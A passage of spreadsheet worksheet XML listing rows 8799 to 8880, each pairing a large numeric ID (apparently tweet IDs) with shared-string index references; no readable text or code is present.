    <row r="8799" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8799">
        <v>1.2327049697337999E+18</v>
      </c>
      <c r="B8799" t="s">
        <v>21155</v>
      </c>
      <c r="C8799" t="s">
        <v>1</v>
      </c>
      <c r="D8799" t="s">
        <v>21156</v>
      </c>
      <c r="E8799" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="8800" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8800">
        <v>1.2327049049903201E+18</v>
      </c>
      <c r="B8800" t="s">
        <v>21157</v>
      </c>
      <c r="C8800" t="s">
        <v>1</v>
      </c>
      <c r="D8800" t="s">
        <v>21158</v>
      </c>
      <c r="E8800" t="s">
        <v>1412</v>
      </c>
    </row>
    <row r="8801" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8801">
        <v>1.2327043898838001E+18</v>
      </c>
      <c r="B8801" t="s">
        <v>21159</v>
      </c>
      <c r="C8801" t="s">
        <v>1</v>
      </c>
      <c r="D8801" t="s">
        <v>21160</v>
      </c>
      <c r="E8801" t="s">
        <v>21161</v>
      </c>
    </row>
    <row r="8802" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8802">
        <v>1.2327043759503601E+18</v>
      </c>
      <c r="B8802" t="s">
        <v>21162</v>
      </c>
      <c r="C8802" t="s">
        <v>1</v>
      </c>
      <c r="D8802" t="s">
        <v>21163</v>
      </c>
      <c r="E8802" t="s">
        <v>21164</v>
      </c>
    </row>
    <row r="8803" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8803">
        <v>1.23270400093745E+18</v>
      </c>
      <c r="B8803" t="s">
        <v>21165</v>
      </c>
      <c r="C8803" t="s">
        <v>1</v>
      </c>
      <c r="D8803" t="s">
        <v>21166</v>
      </c>
      <c r="E8803" t="s">
        <v>10303</v>
      </c>
    </row>
    <row r="8804" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8804">
        <v>1.2327037478867E+18</v>
      </c>
      <c r="B8804" t="s">
        <v>21167</v>
      </c>
      <c r="C8804" t="s">
        <v>1</v>
      </c>
      <c r="D8804" t="s">
        <v>21168</v>
      </c>
      <c r="E8804" t="s">
        <v>21169</v>
      </c>
    </row>
    <row r="8805" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8805">
        <v>1.23270362802622E+18</v>
      </c>
      <c r="B8805" t="s">
        <v>21170</v>
      </c>
      <c r="C8805" t="s">
        <v>1</v>
      </c>
      <c r="D8805" t="s">
        <v>21171</v>
      </c>
      <c r="E8805" t="s">
        <v>1262</v>
      </c>
    </row>
    <row r="8806" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8806">
        <v>1.2327036274852201E+18</v>
      </c>
      <c r="B8806" t="s">
        <v>21172</v>
      </c>
      <c r="C8806" t="s">
        <v>1</v>
      </c>
      <c r="D8806" t="s">
        <v>21173</v>
      </c>
      <c r="E8806" t="s">
        <v>21174</v>
      </c>
    </row>
    <row r="8807" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8807">
        <v>1.23270336570175E+18</v>
      </c>
      <c r="B8807" t="s">
        <v>21175</v>
      </c>
      <c r="C8807" t="s">
        <v>1</v>
      </c>
      <c r="D8807" t="s">
        <v>21176</v>
      </c>
      <c r="E8807" t="s">
        <v>21177</v>
      </c>
    </row>
    <row r="8808" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8808">
        <v>1.23270314426354E+18</v>
      </c>
      <c r="B8808" t="s">
        <v>21178</v>
      </c>
      <c r="C8808" t="s">
        <v>1</v>
      </c>
      <c r="D8808" t="s">
        <v>21179</v>
      </c>
      <c r="E8808" t="s">
        <v>9392</v>
      </c>
    </row>
    <row r="8809" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8809">
        <v>1.2327028432885801E+18</v>
      </c>
      <c r="B8809" t="s">
        <v>21180</v>
      </c>
      <c r="C8809" t="s">
        <v>1</v>
      </c>
      <c r="D8809" t="s">
        <v>21181</v>
      </c>
      <c r="E8809" t="s">
        <v>21182</v>
      </c>
    </row>
    <row r="8810" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8810">
        <v>1.2327025068762601E+18</v>
      </c>
      <c r="B8810" t="s">
        <v>21183</v>
      </c>
      <c r="C8810" t="s">
        <v>1</v>
      </c>
      <c r="D8810" t="s">
        <v>21184</v>
      </c>
      <c r="E8810" t="s">
        <v>7210</v>
      </c>
    </row>
    <row r="8811" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8811">
        <v>1.2327024785856399E+18</v>
      </c>
      <c r="B8811" t="s">
        <v>21185</v>
      </c>
      <c r="C8811" t="s">
        <v>1</v>
      </c>
      <c r="D8811" t="s">
        <v>21186</v>
      </c>
      <c r="E8811" t="s">
        <v>7117</v>
      </c>
    </row>
    <row r="8812" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8812">
        <v>1.2327024419231401E+18</v>
      </c>
      <c r="B8812" t="s">
        <v>21187</v>
      </c>
      <c r="C8812" t="s">
        <v>1</v>
      </c>
      <c r="D8812" t="s">
        <v>21188</v>
      </c>
      <c r="E8812" t="s">
        <v>10450</v>
      </c>
    </row>
    <row r="8813" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8813">
        <v>1.2327023330810399E+18</v>
      </c>
      <c r="B8813" t="s">
        <v>21189</v>
      </c>
      <c r="C8813" t="s">
        <v>1</v>
      </c>
      <c r="D8813" t="s">
        <v>21190</v>
      </c>
      <c r="E8813" t="s">
        <v>5380</v>
      </c>
    </row>
    <row r="8814" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8814">
        <v>1.23270207721155E+18</v>
      </c>
      <c r="B8814" t="s">
        <v>21191</v>
      </c>
      <c r="C8814" t="s">
        <v>1</v>
      </c>
      <c r="D8814" t="s">
        <v>21192</v>
      </c>
      <c r="E8814" t="s">
        <v>21193</v>
      </c>
    </row>
    <row r="8815" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8815">
        <v>1.23270182510464E+18</v>
      </c>
      <c r="B8815" t="s">
        <v>21194</v>
      </c>
      <c r="C8815" t="s">
        <v>1</v>
      </c>
      <c r="D8815" t="s">
        <v>21195</v>
      </c>
      <c r="E8815" t="s">
        <v>21196</v>
      </c>
    </row>
    <row r="8816" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8816">
        <v>1.23270118683229E+18</v>
      </c>
      <c r="B8816" t="s">
        <v>21197</v>
      </c>
      <c r="C8816" t="s">
        <v>1</v>
      </c>
      <c r="D8816" t="s">
        <v>21198</v>
      </c>
      <c r="E8816" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="8817" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8817">
        <v>1.2327007761805199E+18</v>
      </c>
      <c r="B8817" t="s">
        <v>21199</v>
      </c>
      <c r="C8817" t="s">
        <v>1</v>
      </c>
      <c r="D8817" t="s">
        <v>21200</v>
      </c>
      <c r="E8817" t="s">
        <v>4633</v>
      </c>
    </row>
    <row r="8818" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8818">
        <v>1.23270054889539E+18</v>
      </c>
      <c r="B8818" t="s">
        <v>21201</v>
      </c>
      <c r="C8818" t="s">
        <v>1</v>
      </c>
      <c r="D8818" t="s">
        <v>21202</v>
      </c>
      <c r="E8818" t="s">
        <v>2542</v>
      </c>
    </row>
    <row r="8819" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8819">
        <v>1.23270004552019E+18</v>
      </c>
      <c r="B8819" t="s">
        <v>21203</v>
      </c>
      <c r="C8819" t="s">
        <v>1</v>
      </c>
      <c r="D8819" t="s">
        <v>21204</v>
      </c>
      <c r="E8819" t="s">
        <v>21205</v>
      </c>
    </row>
    <row r="8820" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8820">
        <v>1.2327000444590799E+18</v>
      </c>
      <c r="B8820" t="s">
        <v>21203</v>
      </c>
      <c r="C8820" t="s">
        <v>1</v>
      </c>
      <c r="D8820" t="s">
        <v>21206</v>
      </c>
      <c r="E8820" t="s">
        <v>11294</v>
      </c>
    </row>
    <row r="8821" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8821">
        <v>1.2327000212477E+18</v>
      </c>
      <c r="B8821" t="s">
        <v>21207</v>
      </c>
      <c r="C8821" t="s">
        <v>1</v>
      </c>
      <c r="D8821" t="s">
        <v>21208</v>
      </c>
      <c r="E8821" t="s">
        <v>4685</v>
      </c>
    </row>
    <row r="8822" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8822">
        <v>1.2326999790277299E+18</v>
      </c>
      <c r="B8822" t="s">
        <v>21209</v>
      </c>
      <c r="C8822" t="s">
        <v>1</v>
      </c>
      <c r="D8822" t="s">
        <v>21210</v>
      </c>
      <c r="E8822" t="s">
        <v>21211</v>
      </c>
    </row>
    <row r="8823" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8823">
        <v>1.2326998576069299E+18</v>
      </c>
      <c r="B8823" t="s">
        <v>21212</v>
      </c>
      <c r="C8823" t="s">
        <v>1</v>
      </c>
      <c r="D8823" t="s">
        <v>21213</v>
      </c>
      <c r="E8823" t="s">
        <v>2826</v>
      </c>
    </row>
    <row r="8824" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8824">
        <v>1.23269981856226E+18</v>
      </c>
      <c r="B8824" t="s">
        <v>21214</v>
      </c>
      <c r="C8824" t="s">
        <v>1</v>
      </c>
      <c r="D8824" t="s">
        <v>21215</v>
      </c>
      <c r="E8824" t="s">
        <v>6028</v>
      </c>
    </row>
    <row r="8825" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8825">
        <v>1.23269979499026E+18</v>
      </c>
      <c r="B8825" t="s">
        <v>21216</v>
      </c>
      <c r="C8825" t="s">
        <v>1</v>
      </c>
      <c r="D8825" t="s">
        <v>21217</v>
      </c>
      <c r="E8825" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="8826" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8826">
        <v>1.2326997640026501E+18</v>
      </c>
      <c r="B8826" t="s">
        <v>21218</v>
      </c>
      <c r="C8826" t="s">
        <v>1</v>
      </c>
      <c r="D8826" t="s">
        <v>21219</v>
      </c>
      <c r="E8826" t="s">
        <v>4400</v>
      </c>
    </row>
    <row r="8827" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8827">
        <v>1.2326996775036101E+18</v>
      </c>
      <c r="B8827" t="s">
        <v>21220</v>
      </c>
      <c r="C8827" t="s">
        <v>1</v>
      </c>
      <c r="D8827" t="s">
        <v>21221</v>
      </c>
      <c r="E8827" t="s">
        <v>21222</v>
      </c>
    </row>
    <row r="8828" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8828">
        <v>1.23269959365518E+18</v>
      </c>
      <c r="B8828" t="s">
        <v>21223</v>
      </c>
      <c r="C8828" t="s">
        <v>1</v>
      </c>
      <c r="D8828" t="s">
        <v>21224</v>
      </c>
      <c r="E8828" t="s">
        <v>3432</v>
      </c>
    </row>
    <row r="8829" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8829">
        <v>1.23269940973087E+18</v>
      </c>
      <c r="B8829" t="s">
        <v>21225</v>
      </c>
      <c r="C8829" t="s">
        <v>1</v>
      </c>
      <c r="D8829" t="s">
        <v>21226</v>
      </c>
      <c r="E8829" t="s">
        <v>21227</v>
      </c>
    </row>
    <row r="8830" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8830">
        <v>1.2326993392036301E+18</v>
      </c>
      <c r="B8830" t="s">
        <v>21228</v>
      </c>
      <c r="C8830" t="s">
        <v>1</v>
      </c>
      <c r="D8830" t="s">
        <v>21229</v>
      </c>
      <c r="E8830" t="s">
        <v>5485</v>
      </c>
    </row>
    <row r="8831" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8831">
        <v>1.2326992841701299E+18</v>
      </c>
      <c r="B8831" t="s">
        <v>21230</v>
      </c>
      <c r="C8831" t="s">
        <v>1</v>
      </c>
      <c r="D8831" t="s">
        <v>21231</v>
      </c>
      <c r="E8831" t="s">
        <v>21232</v>
      </c>
    </row>
    <row r="8832" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8832">
        <v>1.23269920876077E+18</v>
      </c>
      <c r="B8832" t="s">
        <v>21233</v>
      </c>
      <c r="C8832" t="s">
        <v>1</v>
      </c>
      <c r="D8832" t="s">
        <v>21234</v>
      </c>
      <c r="E8832" t="s">
        <v>7093</v>
      </c>
    </row>
    <row r="8833" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8833">
        <v>1.23269916965311E+18</v>
      </c>
      <c r="B8833" t="s">
        <v>21235</v>
      </c>
      <c r="C8833" t="s">
        <v>1</v>
      </c>
      <c r="D8833" t="s">
        <v>21236</v>
      </c>
      <c r="E8833" t="s">
        <v>7273</v>
      </c>
    </row>
    <row r="8834" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8834">
        <v>1.23269893824909E+18</v>
      </c>
      <c r="B8834" t="s">
        <v>21237</v>
      </c>
      <c r="C8834" t="s">
        <v>1</v>
      </c>
      <c r="D8834" t="s">
        <v>21238</v>
      </c>
      <c r="E8834" t="s">
        <v>21239</v>
      </c>
    </row>
    <row r="8835" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8835">
        <v>1.2326988085149499E+18</v>
      </c>
      <c r="B8835" t="s">
        <v>21240</v>
      </c>
      <c r="C8835" t="s">
        <v>1</v>
      </c>
      <c r="D8835" t="s">
        <v>21241</v>
      </c>
      <c r="E8835" t="s">
        <v>5063</v>
      </c>
    </row>
    <row r="8836" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8836">
        <v>1.2326987284876401E+18</v>
      </c>
      <c r="B8836" t="s">
        <v>21242</v>
      </c>
      <c r="C8836" t="s">
        <v>1</v>
      </c>
      <c r="D8836" t="s">
        <v>21243</v>
      </c>
      <c r="E8836" t="s">
        <v>21244</v>
      </c>
    </row>
    <row r="8837" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8837">
        <v>1.23269872847921E+18</v>
      </c>
      <c r="B8837" t="s">
        <v>21242</v>
      </c>
      <c r="C8837" t="s">
        <v>1</v>
      </c>
      <c r="D8837" t="s">
        <v>21245</v>
      </c>
      <c r="E8837" t="s">
        <v>21246</v>
      </c>
    </row>
    <row r="8838" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8838">
        <v>1.2326985846231199E+18</v>
      </c>
      <c r="B8838" t="s">
        <v>21247</v>
      </c>
      <c r="C8838" t="s">
        <v>1</v>
      </c>
      <c r="D8838" t="s">
        <v>21248</v>
      </c>
      <c r="E8838" t="s">
        <v>21249</v>
      </c>
    </row>
    <row r="8839" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8839">
        <v>1.2326981583560801E+18</v>
      </c>
      <c r="B8839" t="s">
        <v>21250</v>
      </c>
      <c r="C8839" t="s">
        <v>1</v>
      </c>
      <c r="D8839" t="s">
        <v>21251</v>
      </c>
      <c r="E8839" t="s">
        <v>1774</v>
      </c>
    </row>
    <row r="8840" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8840">
        <v>1.2326981371202501E+18</v>
      </c>
      <c r="B8840" t="s">
        <v>21252</v>
      </c>
      <c r="C8840" t="s">
        <v>1</v>
      </c>
      <c r="D8840" t="s">
        <v>21253</v>
      </c>
      <c r="E8840" t="s">
        <v>21254</v>
      </c>
    </row>
    <row r="8841" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8841">
        <v>1.23269748602174E+18</v>
      </c>
      <c r="B8841" t="s">
        <v>21255</v>
      </c>
      <c r="C8841" t="s">
        <v>1</v>
      </c>
      <c r="D8841" t="s">
        <v>21256</v>
      </c>
      <c r="E8841" t="s">
        <v>21257</v>
      </c>
    </row>
    <row r="8842" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8842">
        <v>1.23269744062237E+18</v>
      </c>
      <c r="B8842" t="s">
        <v>21258</v>
      </c>
      <c r="C8842" t="s">
        <v>1</v>
      </c>
      <c r="D8842" t="s">
        <v>21259</v>
      </c>
      <c r="E8842" t="s">
        <v>7710</v>
      </c>
    </row>
    <row r="8843" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8843">
        <v>1.23269730895488E+18</v>
      </c>
      <c r="B8843" t="s">
        <v>21260</v>
      </c>
      <c r="C8843" t="s">
        <v>1</v>
      </c>
      <c r="D8843" t="s">
        <v>21261</v>
      </c>
      <c r="E8843" t="s">
        <v>21262</v>
      </c>
    </row>
    <row r="8844" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8844">
        <v>1.23269712789936E+18</v>
      </c>
      <c r="B8844" t="s">
        <v>21263</v>
      </c>
      <c r="C8844" t="s">
        <v>1</v>
      </c>
      <c r="D8844" t="s">
        <v>21264</v>
      </c>
      <c r="E8844" t="s">
        <v>2489</v>
      </c>
    </row>
    <row r="8845" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8845">
        <v>1.2326970273912499E+18</v>
      </c>
      <c r="B8845" t="s">
        <v>21265</v>
      </c>
      <c r="C8845" t="s">
        <v>1</v>
      </c>
      <c r="D8845" t="s">
        <v>21266</v>
      </c>
      <c r="E8845" t="s">
        <v>18230</v>
      </c>
    </row>
    <row r="8846" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8846">
        <v>1.2326969009496399E+18</v>
      </c>
      <c r="B8846" t="s">
        <v>21267</v>
      </c>
      <c r="C8846" t="s">
        <v>1</v>
      </c>
      <c r="D8846" t="s">
        <v>21268</v>
      </c>
      <c r="E8846" t="s">
        <v>21269</v>
      </c>
    </row>
    <row r="8847" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8847">
        <v>1.2326968508405E+18</v>
      </c>
      <c r="B8847" t="s">
        <v>21270</v>
      </c>
      <c r="C8847" t="s">
        <v>1</v>
      </c>
      <c r="D8847" t="s">
        <v>21271</v>
      </c>
      <c r="E8847" t="s">
        <v>21272</v>
      </c>
    </row>
    <row r="8848" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8848">
        <v>1.2326968329937101E+18</v>
      </c>
      <c r="B8848" t="s">
        <v>21273</v>
      </c>
      <c r="C8848" t="s">
        <v>1</v>
      </c>
      <c r="D8848" t="s">
        <v>21274</v>
      </c>
      <c r="E8848" t="s">
        <v>21275</v>
      </c>
    </row>
    <row r="8849" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8849">
        <v>1.23269671843891E+18</v>
      </c>
      <c r="B8849" t="s">
        <v>21276</v>
      </c>
      <c r="C8849" t="s">
        <v>1</v>
      </c>
      <c r="D8849" t="s">
        <v>21277</v>
      </c>
      <c r="E8849" t="s">
        <v>21278</v>
      </c>
    </row>
    <row r="8850" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8850">
        <v>1.23269657443568E+18</v>
      </c>
      <c r="B8850" t="s">
        <v>21279</v>
      </c>
      <c r="C8850" t="s">
        <v>1</v>
      </c>
      <c r="D8850" t="s">
        <v>21280</v>
      </c>
      <c r="E8850" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="8851" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8851">
        <v>1.2326964039540301E+18</v>
      </c>
      <c r="B8851" t="s">
        <v>21281</v>
      </c>
      <c r="C8851" t="s">
        <v>1</v>
      </c>
      <c r="D8851" t="s">
        <v>21282</v>
      </c>
      <c r="E8851" t="s">
        <v>19443</v>
      </c>
    </row>
    <row r="8852" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8852">
        <v>1.2326963414296699E+18</v>
      </c>
      <c r="B8852" t="s">
        <v>21283</v>
      </c>
      <c r="C8852" t="s">
        <v>1</v>
      </c>
      <c r="D8852" t="s">
        <v>21284</v>
      </c>
      <c r="E8852" t="s">
        <v>19211</v>
      </c>
    </row>
    <row r="8853" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8853">
        <v>1.2326961855483E+18</v>
      </c>
      <c r="B8853" t="s">
        <v>21285</v>
      </c>
      <c r="C8853" t="s">
        <v>1</v>
      </c>
      <c r="D8853" t="s">
        <v>21286</v>
      </c>
      <c r="E8853" t="s">
        <v>19211</v>
      </c>
    </row>
    <row r="8854" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8854">
        <v>1.2326960701127501E+18</v>
      </c>
      <c r="B8854" t="s">
        <v>21287</v>
      </c>
      <c r="C8854" t="s">
        <v>1</v>
      </c>
      <c r="D8854" t="s">
        <v>21288</v>
      </c>
      <c r="E8854" t="s">
        <v>3196</v>
      </c>
    </row>
    <row r="8855" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8855">
        <v>1.2326955894581E+18</v>
      </c>
      <c r="B8855" t="s">
        <v>21289</v>
      </c>
      <c r="C8855" t="s">
        <v>1</v>
      </c>
      <c r="D8855" t="s">
        <v>21290</v>
      </c>
      <c r="E8855" t="s">
        <v>21291</v>
      </c>
    </row>
    <row r="8856" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8856">
        <v>1.23269520616146E+18</v>
      </c>
      <c r="B8856" t="s">
        <v>21292</v>
      </c>
      <c r="C8856" t="s">
        <v>1</v>
      </c>
      <c r="D8856" t="s">
        <v>21293</v>
      </c>
      <c r="E8856" t="s">
        <v>21294</v>
      </c>
    </row>
    <row r="8857" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8857">
        <v>1.2326945959113201E+18</v>
      </c>
      <c r="B8857" t="s">
        <v>21295</v>
      </c>
      <c r="C8857" t="s">
        <v>1</v>
      </c>
      <c r="D8857" t="s">
        <v>21296</v>
      </c>
      <c r="E8857" t="s">
        <v>18339</v>
      </c>
    </row>
    <row r="8858" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8858">
        <v>1.23269431469583E+18</v>
      </c>
      <c r="B8858" t="s">
        <v>21297</v>
      </c>
      <c r="C8858" t="s">
        <v>1</v>
      </c>
      <c r="D8858" t="s">
        <v>21298</v>
      </c>
      <c r="E8858" t="s">
        <v>21299</v>
      </c>
    </row>
    <row r="8859" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8859">
        <v>1.2326939639346501E+18</v>
      </c>
      <c r="B8859" t="s">
        <v>21300</v>
      </c>
      <c r="C8859" t="s">
        <v>1</v>
      </c>
      <c r="D8859" t="s">
        <v>21301</v>
      </c>
      <c r="E8859" t="s">
        <v>21302</v>
      </c>
    </row>
    <row r="8860" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8860">
        <v>1.2326938142901901E+18</v>
      </c>
      <c r="B8860" t="s">
        <v>21303</v>
      </c>
      <c r="C8860" t="s">
        <v>1</v>
      </c>
      <c r="D8860" t="s">
        <v>21304</v>
      </c>
      <c r="E8860" t="s">
        <v>21305</v>
      </c>
    </row>
    <row r="8861" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8861">
        <v>1.2326937747504799E+18</v>
      </c>
      <c r="B8861" t="s">
        <v>21306</v>
      </c>
      <c r="C8861" t="s">
        <v>1</v>
      </c>
      <c r="D8861" t="s">
        <v>21307</v>
      </c>
      <c r="E8861" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="8862" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8862">
        <v>1.2326937319224399E+18</v>
      </c>
      <c r="B8862" t="s">
        <v>21308</v>
      </c>
      <c r="C8862" t="s">
        <v>1</v>
      </c>
      <c r="D8862" t="s">
        <v>21309</v>
      </c>
      <c r="E8862" t="s">
        <v>16597</v>
      </c>
    </row>
    <row r="8863" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8863">
        <v>1.23269287508912E+18</v>
      </c>
      <c r="B8863" t="s">
        <v>21310</v>
      </c>
      <c r="C8863" t="s">
        <v>1</v>
      </c>
      <c r="D8863" t="s">
        <v>21311</v>
      </c>
      <c r="E8863" t="s">
        <v>21312</v>
      </c>
    </row>
    <row r="8864" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8864">
        <v>1.2326928316864599E+18</v>
      </c>
      <c r="B8864" t="s">
        <v>21313</v>
      </c>
      <c r="C8864" t="s">
        <v>1</v>
      </c>
      <c r="D8864" t="s">
        <v>21314</v>
      </c>
      <c r="E8864" t="s">
        <v>4633</v>
      </c>
    </row>
    <row r="8865" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8865">
        <v>1.2326925153602701E+18</v>
      </c>
      <c r="B8865" t="s">
        <v>21315</v>
      </c>
      <c r="C8865" t="s">
        <v>1</v>
      </c>
      <c r="D8865" t="s">
        <v>21316</v>
      </c>
      <c r="E8865" t="s">
        <v>1913</v>
      </c>
    </row>
    <row r="8866" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8866">
        <v>1.2326921039117399E+18</v>
      </c>
      <c r="B8866" t="s">
        <v>21317</v>
      </c>
      <c r="C8866" t="s">
        <v>1</v>
      </c>
      <c r="D8866" t="s">
        <v>21318</v>
      </c>
      <c r="E8866" t="s">
        <v>18616</v>
      </c>
    </row>
    <row r="8867" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8867">
        <v>1.23269180863694E+18</v>
      </c>
      <c r="B8867" t="s">
        <v>21319</v>
      </c>
      <c r="C8867" t="s">
        <v>1</v>
      </c>
      <c r="D8867" t="s">
        <v>21320</v>
      </c>
      <c r="E8867" t="s">
        <v>8740</v>
      </c>
    </row>
    <row r="8868" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8868">
        <v>1.2326911540067E+18</v>
      </c>
      <c r="B8868" t="s">
        <v>21321</v>
      </c>
      <c r="C8868" t="s">
        <v>1</v>
      </c>
      <c r="D8868" t="s">
        <v>21322</v>
      </c>
      <c r="E8868" t="s">
        <v>21323</v>
      </c>
    </row>
    <row r="8869" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8869">
        <v>1.23269112717165E+18</v>
      </c>
      <c r="B8869" t="s">
        <v>21324</v>
      </c>
      <c r="C8869" t="s">
        <v>1</v>
      </c>
      <c r="D8869" t="s">
        <v>21325</v>
      </c>
      <c r="E8869" t="s">
        <v>21326</v>
      </c>
    </row>
    <row r="8870" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8870">
        <v>1.23268945291875E+18</v>
      </c>
      <c r="B8870" t="s">
        <v>21327</v>
      </c>
      <c r="C8870" t="s">
        <v>1</v>
      </c>
      <c r="D8870" t="s">
        <v>21328</v>
      </c>
      <c r="E8870" t="s">
        <v>18303</v>
      </c>
    </row>
    <row r="8871" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8871">
        <v>1.2326893272154601E+18</v>
      </c>
      <c r="B8871" t="s">
        <v>21329</v>
      </c>
      <c r="C8871" t="s">
        <v>1</v>
      </c>
      <c r="D8871" t="s">
        <v>21330</v>
      </c>
      <c r="E8871" t="s">
        <v>8241</v>
      </c>
    </row>
    <row r="8872" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8872">
        <v>1.23268901658109E+18</v>
      </c>
      <c r="B8872" t="s">
        <v>21331</v>
      </c>
      <c r="C8872" t="s">
        <v>1</v>
      </c>
      <c r="D8872" t="s">
        <v>21332</v>
      </c>
      <c r="E8872" t="s">
        <v>21333</v>
      </c>
    </row>
    <row r="8873" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8873">
        <v>1.2326884551020201E+18</v>
      </c>
      <c r="B8873" t="s">
        <v>21334</v>
      </c>
      <c r="C8873" t="s">
        <v>1</v>
      </c>
      <c r="D8873" t="s">
        <v>21335</v>
      </c>
      <c r="E8873" t="s">
        <v>21244</v>
      </c>
    </row>
    <row r="8874" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8874">
        <v>1.2326877270968699E+18</v>
      </c>
      <c r="B8874" t="s">
        <v>21336</v>
      </c>
      <c r="C8874" t="s">
        <v>1</v>
      </c>
      <c r="D8874" t="s">
        <v>21337</v>
      </c>
      <c r="E8874" t="s">
        <v>21338</v>
      </c>
    </row>
    <row r="8875" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8875">
        <v>1.23268685554558E+18</v>
      </c>
      <c r="B8875" t="s">
        <v>21339</v>
      </c>
      <c r="C8875" t="s">
        <v>1</v>
      </c>
      <c r="D8875" t="s">
        <v>21340</v>
      </c>
      <c r="E8875" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="8876" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8876">
        <v>1.2326868540231301E+18</v>
      </c>
      <c r="B8876" t="s">
        <v>21341</v>
      </c>
      <c r="C8876" t="s">
        <v>1</v>
      </c>
      <c r="D8876" t="s">
        <v>21342</v>
      </c>
      <c r="E8876" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="8877" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8877">
        <v>1.2326865681057001E+18</v>
      </c>
      <c r="B8877" t="s">
        <v>21343</v>
      </c>
      <c r="C8877" t="s">
        <v>1</v>
      </c>
      <c r="D8877" t="s">
        <v>21344</v>
      </c>
      <c r="E8877" t="s">
        <v>21345</v>
      </c>
    </row>
    <row r="8878" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8878">
        <v>1.2326861520853701E+18</v>
      </c>
      <c r="B8878" t="s">
        <v>21346</v>
      </c>
      <c r="C8878" t="s">
        <v>1</v>
      </c>
      <c r="D8878" t="s">
        <v>21347</v>
      </c>
      <c r="E8878" t="s">
        <v>21348</v>
      </c>
    </row>
    <row r="8879" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8879">
        <v>1.23268600514627E+18</v>
      </c>
      <c r="B8879" t="s">
        <v>21349</v>
      </c>
      <c r="C8879" t="s">
        <v>1</v>
      </c>
      <c r="D8879" t="s">
        <v>21350</v>
      </c>
      <c r="E8879" t="s">
        <v>19446</v>
      </c>
    </row>
    <row r="8880" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8880">
